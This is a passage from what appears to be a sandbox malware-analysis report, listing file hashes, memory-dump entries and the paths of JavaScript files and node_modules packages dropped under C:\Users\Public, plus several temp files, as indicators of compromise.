| SHA256 | 340c15e404619ed7d2c158c8956c1c44dfa2649fbb33c72e043bd538d35b153c |
| SHA512 | e75ee3e67f37fe614b6636db3e32f335c8196a98de923ba5a516fb5eb36b7421756dfa888d4d1949a32debd5d9f331159f69d51ec796f7fa48e4a8ae4e8ce3db |
C:\Users\Public\run.js
| MD5 | 166e57b73fd399b0f54c415d22b235f6 |
| SHA1 | f20bf715826dc97a5e26c7acc4310d32213cc2b7 |
| SHA256 | f7741744738c58c8cd5b1b8bc756860a68a8b3378576c421f0f597edf29f5df3 |
| SHA512 | e2a32241f607f0b6842ca2546002ad086035161249bd2dd3bf04a05dcbf6ad660ef91d23507c0f0c983769ade7d73d0b627b8c16c31954e607b4261b89979eda |
C:\Users\Public\package.json
| MD5 | 561b0767d774c4ee83cff11195bf0f78 |
| SHA1 | f2106c79a585a699a70bd7bdf8e49425d0230fd7 |
| SHA256 | 10a2973b3545db3ea55c71f241676db0825c1cdecd1ef070a0c71b56b48f33ca |
| SHA512 | 7e99c9f6ae3bcfe2f8c730dd7274bd7cfca87a76625af6be72a60b09fe48261b3240b051bad4c3c0bdc5781c3ecd730766cd83ef936ee4d5d08aec911e181dd2 |
memory/5008-3046-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp
memory/5008-3047-0x000001BCDB240000-0x000001BCDB250000-memory.dmp
memory/5008-3048-0x000001BCDB240000-0x000001BCDB250000-memory.dmp
C:\Users\Public\get.js
C:\Users\Public\node_modules\brace-expansion\index.js
C:\Users\Public\node_modules\lazystream\node_modules\safe-buffer\index.js
C:\Users\Public\node_modules\lodash\_setToString.js
C:\Users\Public\node_modules\lodash\_apply.js
C:\Users\Public\node_modules\lodash\_overRest.js
C:\Users\Public\node_modules\lodash\identity.js
C:\Users\Public\node_modules\lodash\_baseRest.js
C:\Users\Public\node_modules\lodash\defaults.js
C:\Users\Public\node_modules\lodash\package.json
C:\Users\Public\node_modules\normalize-path\index.js
C:\Users\Public\node_modules\normalize-path\package.json
C:\Users\Public\node_modules\lazystream\node_modules\readable-stream\lib\_stream_passthrough.js
C:\Users\Public\node_modules\lazystream\node_modules\readable-stream\lib\_stream_transform.js
C:\Users\Public\node_modules\lazystream\node_modules\readable-stream\lib\_stream_duplex.js
C:\Users\Public\node_modules\util-deprecate\node.js
C:\Users\Public\node_modules\util-deprecate\package.json
C:\Users\Public\node_modules\lazystream\node_modules\readable-stream\lib\_stream_writable.js
C:\Users\Public\node_modules\lazystream\node_modules\readable-stream\lib\internal\streams\destroy.js
C:\Users\Public\node_modules\lazystream\node_modules\readable-stream\lib\internal\streams\BufferList.js
C:\Users\Public\node_modules\inherits\inherits.js
C:\Users\Public\node_modules\inherits\package.json
C:\Users\Public\node_modules\core-util-is\lib\util.js
C:\Users\Public\node_modules\core-util-is\package.json
C:\Users\Public\node_modules\lazystream\node_modules\safe-buffer\package.json
C:\Users\Public\node_modules\lazystream\node_modules\readable-stream\lib\internal\streams\stream.js
C:\Users\Public\node_modules\isarray\index.js
C:\Users\Public\node_modules\isarray\package.json
C:\Users\Public\node_modules\process-nextick-args\index.js
C:\Users\Public\node_modules\process-nextick-args\package.json
C:\Users\Public\node_modules\lazystream\node_modules\readable-stream\lib\_stream_readable.js
C:\Users\Public\node_modules\lazystream\node_modules\readable-stream\readable.js
C:\Users\Public\node_modules\lazystream\node_modules\readable-stream\passthrough.js
C:\Users\Public\node_modules\lazystream\node_modules\readable-stream\package.json
C:\Users\Public\node_modules\lazystream\lib\lazystream.js
C:\Users\Public\node_modules\lazystream\package.json
C:\Users\Public\node_modules\graceful-fs\clone.js
C:\Users\Public\node_modules\graceful-fs\legacy-streams.js
C:\Users\Public\node_modules\graceful-fs\polyfills.js
C:\Users\Public\node_modules\graceful-fs\graceful-fs.js
C:\Users\Public\node_modules\graceful-fs\package.json
C:\Users\Public\node_modules\archiver-utils\index.js
C:\Users\Public\node_modules\archiver-utils\package.json
C:\Users\Public\node_modules\brace-expansion\package.json
C:\Users\Public\node_modules\minimatch\lib\path.js
C:\Users\Public\node_modules\minimatch\minimatch.js
C:\Users\Public\node_modules\minimatch\package.json
C:\Users\Public\node_modules\readdir-glob\index.js
C:\Users\Public\node_modules\readdir-glob\package.json
C:\Users\Public\node_modules\archiver\lib\core.js
C:\Users\Public\node_modules\archiver\index.js
C:\Users\Public\node_modules\archiver\package.json
C:\Users\Public\node_modules\async\dist\async.js
C:\Users\Public\node_modules\async\package.json
C:\Users\Public\node_modules\balanced-match\index.js
C:\Users\Public\node_modules\balanced-match\package.json
C:\Users\Admin\AppData\Local\Temp\places.raw
C:\Users\Admin\AppData\Local\Temp\tmp3109.tmp.dat
C:\Users\Admin\AppData\Local\Temp\tmp313F.tmp.dat